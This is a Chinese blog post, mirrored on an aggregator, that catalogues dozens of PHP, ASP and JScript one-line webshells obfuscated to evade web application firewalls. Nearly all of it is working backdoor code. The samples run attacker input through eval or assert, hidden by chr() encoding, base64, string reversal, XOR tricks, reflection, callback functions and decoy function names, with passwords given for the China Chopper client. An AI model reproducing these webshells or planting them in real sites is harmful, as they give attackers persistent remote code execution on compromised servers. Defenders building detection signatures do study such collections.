2
WebShell - 贫民窟的艺术家
source link: https://joychou.org/web/webshell.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
把之前写的内容全部删了,重新写了一份14年整理的东西,当时写的标题叫做过狗后门(包括一句话)。
有很多后门都是入侵分析Webshell存下来的。
前几天去参加一个比赛,突发奇想想记录点什么东西……
Github地址:https://github.com/JoyChou93/webshell
PHP一句话木马
利用数组,维数自己随意构造
<?php
$a = 0;
$item['jc'] = 'a'.'s'.'s'.'e'.'r'.'t'; // 定义$item为一维数组
$array[] = $item; // $array为一个二维数组
$array[$a]['jc']($_POST['cmd']);
?><?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['whirlwind']); //密码whirlwind 菜刀
?>
利用key获取数组key
<?php
$lang = (string)key($_GET); // key返回数组的键名
$lang($_POST['cmd']);
?>http://localhost/test.php?assert=test,菜刀密码cmd
<?php
$a='assert'; //替换成$a='eval';会报错。
$a($_POST[x]);
?><?php
$a=@strrev(ecalper_gerp);
$b=@strrev(edoced_46esab);
echo @$a($b(L3h4L2Ug),$_POST[jc],axxa); // /xx/e
?><?php
assert(chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41)); // chr解出来是assert($_POST[x]),不能替换成eval(chr(97).chr(115)
?><?php
preg_replace(chr(47).chr(100).chr(0x75).chr(111).chr(115).chr(111).chr(102).chr(116).chr(0x2f).chr(0x69).chr(115).chr(101),chr(0x40).chr(0x65).chr(0x76).chr(97).chr(0x6c).chr(0x28).chr(0x27).chr(0x40).chr(101).chr(0x76).chr(0x61).chr(0x6c).chr(40).chr(40).chr(0x67).chr(0x65).chr(116).chr(95).chr(0x6d).chr(97).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(113).chr(117).chr(0x6f).chr(0x74).chr(101).chr(115).chr(95).chr(0x67).chr(112).chr(0x63).chr(40).chr(41).chr(0x3f).chr(0x73).chr(0x74).chr(114).chr(0x69).chr(112).chr(115).chr(0x6c).chr(97).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(40).chr(36).chr(0x5f).chr(0x50).chr(79).chr(0x53).chr(0x54).chr(91).chr(68).chr(0x38).chr(79).chr(0x57).chr(88).chr(0x32).chr(89).chr(0x5d).chr(41).chr(58).chr(36).chr(95).chr(80).chr(79).chr(0x53).chr(84).chr(0x5b).chr(0x44).chr(0x38).chr(79).chr(87).chr(0x58).chr(0x32).chr(0x59).chr(0x5d).chr(41).chr(41).chr(0x3b).chr(39).chr(0x29).chr(59),chr(0x64).chr(117).chr(111).chr(115).chr(0x6f).chr(102).chr(116));
?><?php
preg_replace('/duosoft/ise', '@eval('@eval((get_magic_quotes_gpc()?stripslashes($_POST[D8OWX2Y]):$_POST[D8OWX2Y]));');', 'duosoft' );
?><?php
// chr
$_uU=chr(99).chr(104).chr(114);
// eval($_POST[1]);
$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);
// create_function
$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);
//$_=create_function("", 'eval($_POST[1]);');
$_=$_fF("",$_cC);
@$_();?>解密后:eval($_POST[1]);
<?php
assert(
$_POST[x]
);
?>
<?php
assert(
$_POST['xx'
]
);
?>
密码为cmd
<?PHP eVal ( gzinFlate ( base64_dEcode ('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==') ) );exit;?><?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); // 密码-7
?>和正常代码混淆
<?php
//pwd=addimg
$sss = "ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NCcGMzTmxkQ2dnSkY5U1JWRlZSVk5VV3lkd1lYTnpKMTBnS1NsN1FHVjJZV3dvSUdKaGMyVTJORjlrWldOdlpHVW9JQ1JmVWtWUlZVVlRWRnNuY0dGemN5ZGRJQ2tnS1R0OVpXeHpaWHRBWlhaaGJDZ2dKRjlTUlZGVlJWTlVXeWRoWkdScGJXY25YU0FwTzMwPSIpKQ==";
function CheckSQL( &$val ){
$v = "select|update|union|set|where|order|and|or";
$val = base64_decode( $val );
}
CheckSQL( $sss );
preg_replace('/uploadsafe.inc.php/e','@'.$sss, 'uploadsafe.inc.php');
?>解密后为:if ( isset( $_REQUEST['pass'] )){@eval( base64_decode( $_REQUEST['pass'] ) );}else{@eval( $_REQUEST['addimg'] );}<?php
if (!function_exists('get_c1ient_area')) {
function get_c1ient_area() {
$_SERVER['REM0TE_ADDR'] = 'REM0TE_CREATE_QGV2YWwoJF';
$_SERVER['HTTP_CL1ENT_1P'] = 'STR_9QT1NUW2F';
$_SERVER['HTTP_X_F0RWARDED_FOR'] = 'BASE_SERVER64_kbV0pOw==';
$get_c1ient_area = substr($_SERVER['REM0TE_ADDR'], 7, 7) . "FUNCTION";
$getenv = substr($_SERVER['HTTP_CL1ENT_1P'], 0, 4) . "REPLACE";
$isset = $getenv('_SERVER', '', substr($_SERVER['HTTP_X_F0RWARDED_FOR'], 0, 14)) . "DECODE";
//@eval($_POST[adm])
$rea1area = $isset(substr($_SERVER['REM0TE_ADDR'], 14) . substr($_SERVER['HTTP_CL1ENT_1P'], 4) . substr($_SERVER['HTTP_X_F0RWARDED_FOR'], 14));
echo $rea1area;
$on1inearea = $get_c1ient_area('', $rea1area);
$on1inearea();
return @$onlinearea;
}
$on1inearea = get_c1ient_area();
}
?>解密后为:@eval($_POST[adm])
<?php
# return 32md5 back 6
function getMd5($md5 = null) {
$key = substr(md5($md5),26);
return $key;
}
$array = array(
chr(112).chr(97).chr(115).chr(115), //pass
chr(99).chr(104).chr(101).chr(99).chr(107), // check
chr(99).chr(52).chr(53).chr(49).chr(99).chr(99) // c451cc
);
if ( isset($_POST) ){
$request = &$_POST;
}
elseif ( isset($_REQUEST) ) $request = &$_REQUEST;
if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) {
if ( getMd5($request[$array[0]]) == $array[2] ) { //md5(pass) == c451cc
$token = preg_replace (
chr(47) . $array[2] . chr(47) . chr(101), // /c451cc/e
$request[$array[1]],
$array[2]
);
}
}
?><?php
$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];
if($MMIC >1000000){
die('404');
}
if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"]))
{
$__PHP_debug = array (
'ZendName' => '70,61,73,73',
'ZendPort' => '63,68,65,63,6b',
'ZendSalt' => '792e19812fafd57c7ac150af768d95ce'
);
$__PHP_replace = array (
pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
$__PHP_debug['ZendSalt']
);
$__PHP_request = &$_POST;
$__PHP_token = md5($__PHP_request[$__PHP_replace[0]]);
if ($__PHP_token == $__PHP_replace[2])
{
$__PHP_token = preg_replace (
chr(47).$__PHP_token.chr(47).chr(101),
$__PHP_request[$__PHP_replace[1]],
$__PHP_token
);
unset (
$__PHP_debug,
$__PHP_replace,
$__PHP_request,
$__PHP_token
);
if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');
}
}
PHP反射机制
<?php
/**
* eva
* l($_POS
* T["c"]);
* asse
* rt
*/
class TestClass { }
$rc = new ReflectionClass('TestClass');
$str = $rc->getDocComment();
$payload = substr($str,strpos($str,'ev'),3);
$payload .= substr($str,strpos($str,'l('),7);
$payload .= substr($str,strpos($str,'T['),8);
$exe = substr($str, strpos($str, 'as'), 4);
$exe .= substr($str, strpos($str, 'rt'), 2);
$exe($payload);
?> 利用注释和php的反射机制(可获取注释),解密后:
assert(eval($_POST["c"]));利用session_set_save_handler回调函数。
<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
// open第一个被调用,类似 类的构造函数
function open($save_path, $session_name) {
}
// close最后一个被调用,类似 类的析构函数
function close() {
}
// 得到session id后,等价于执行assert($_REQUEST[phpcms])
session_id($_REQUEST[phpcms]);
function write($id, $sess_data) {
}
function destroy($id) {
}
function gc() {
}
// 第三个参数为read read(string $sessionId)
session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
@session_start(); //会话打开的时候,自动调用回调函数
$cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>整个代码逻辑:session_set_save_handler设置6个回调,当seession_start的时候,自动调用第三个$session回调函数,第三个函数的原型是read(string $sessionId),这里相当于是assert(string $sessionId),而参数是sessionId。当调用session_id($_REQUEST[phpcms]);这句代码后,返回sessionId,最后就相当于执行assert($_REQUEST[phpcms])
<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function($e, $_REQUEST['pass']);
?>
<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
?><?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
//filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
?><?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
?>
$_clasc = $_REQUEST['mod'];
$arr = array($_POST['bato'] => '|.*|e',);
@array_walk_recursive($arr, $_clasc, '');利用反引号执行命令
<?php
$cmd =base64_decode('dmVy='); // ver
echo `$cmd`. `$_GET[username]`; // ``反引号的作用相当于shell_exec,执行系统命令
//或
$var = `net user`;
echo "$var";
?><?php
$num = +"";
$num++; $num++; $num++; $num++;
$four = $num; // 4
$num++; $num++;
$six = $num; // 6
$_="";
$_[+$_]++; // +""为0
$_=$_.""; // $_为字符串"Array"
$___=$_[+""];//A
$____=$___;
$____++;//B
$_____=$____;
$_____++;//C
$______=$_____;
$______++;//D
$_______=$______;
$_______++;//E
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O
$_________=$________;
$_________++;$_________++;$_________++;$_________++;//S
$_=$____.$___.$_________.$_______.$six.$four.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++;//R
$_____=$_________;
$_____++;//T
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbY21kXSk="));
//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk="));
//ASSERT(eval($_POST[cmd]));
?><?php
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?><?php
$y = ~"瀸寶崑"; // assert
$cmd = ~"暅挌挌洖"; // jcmemeda
$y($_REQUEST[$cmd]);
?>解密后:assert($_REQUEST[jcmemeda])
ASP一句话木马
标准一句话
<%eval request("sb")%>
<%execute request("sb")%>
<%Eval(Request(chr(35)))%> password:#
<%Eval(((Request(chr(35)))))%> 可以有多对括号
<%ExecuteGlobal request("sb")%>
<%eval request.form("#")%>
<%eval request.item("#")%>
<%eval request("chopper")%>
<%execute request("1")%>
// 单独运行500错误,但是菜刀能连。
<%a=request("1")%><%execute a%>
// 单独运行不报错,菜刀能连
<%a=request("1")%><%eval a%>
// 单独运行500错误,但是菜刀能连。
<%a=request("1")%><%executeglobal a%>利用utf-7编码
密码是#,解密只需要将+k-去掉即可,这里的k可以是任意字符,长度也是随意。
<%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%><%@codepage=65000%>
<%response.codepage=936:eval request("#")%>密码是:c
<%@codepage=65000%>
<%e+x-v+x-a+x-l(+x-r+x-e+x-q+x-u+x-e+x-s+x-t+x-(+x-+ACI-c+ACI)+x-)+x-%> 字符串逆序
StrReverse Replace加密,解密后为:Execute eval request("cmd")
<%
Function decode(Code)
decode=Replace(StrReverse(Code),"/*/","""")
End Function
Execute decode(")/*/dmc/*/(tseuqer lave")
%> AASP自带逆序函数
<%execute(strreverse(")""xx""(tseuqer lave"))%>利用chr ,request
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("1"))%>利用asp的&连接符
<% eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")") %><%
xx=request("xx")
eval xx
%> <%
xx=request("xx")
Rain=xx
eval Rain
%> <%
xx=request("xx")
Rain=xx
bb=Rain
if 1=0 then
response.write("123")
else
eval bb
end if
%> 字符串替换(replace函数)
<%
xxx="e0x0e0c0ut0e(0req0ue0st(""x0x""))"
xxx=replace(xxx,"0","")
eval xxx
%>chr()连接字符串
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>Mid()连接字符串
基本思路:乱序一个字符串然后反复Mid取字符构成一句话。
<%
Function d(s)
d=Mid(love,s,1)
End Function
love="(tqxuesrav l)"&""""
execute(d(6)&d(10)&d(9)&d(12)&d(11)&d(8)&d(6)&d(3)&d(5)&d(6)&d(7)&d(2)&d(1)&d(14)&d(4)&d(4)&d(14)&d(13))
%>字符连接成字符串
<%eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0″&"-"&"2″&"-"&"5″&")"&")")%> 密码-7 Jscript
< %@ Page Language = Jscript %>
< %var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -7< %@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%>
本文由 JoyChou 创作,采用 知识共享署名4.0 国际许可协议进行许可
本站文章除注明转载/出处外,均为本站原创或翻译,转载前请务必署名
最后编辑时间为: Oct 6, 2017 at 03:08 am
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK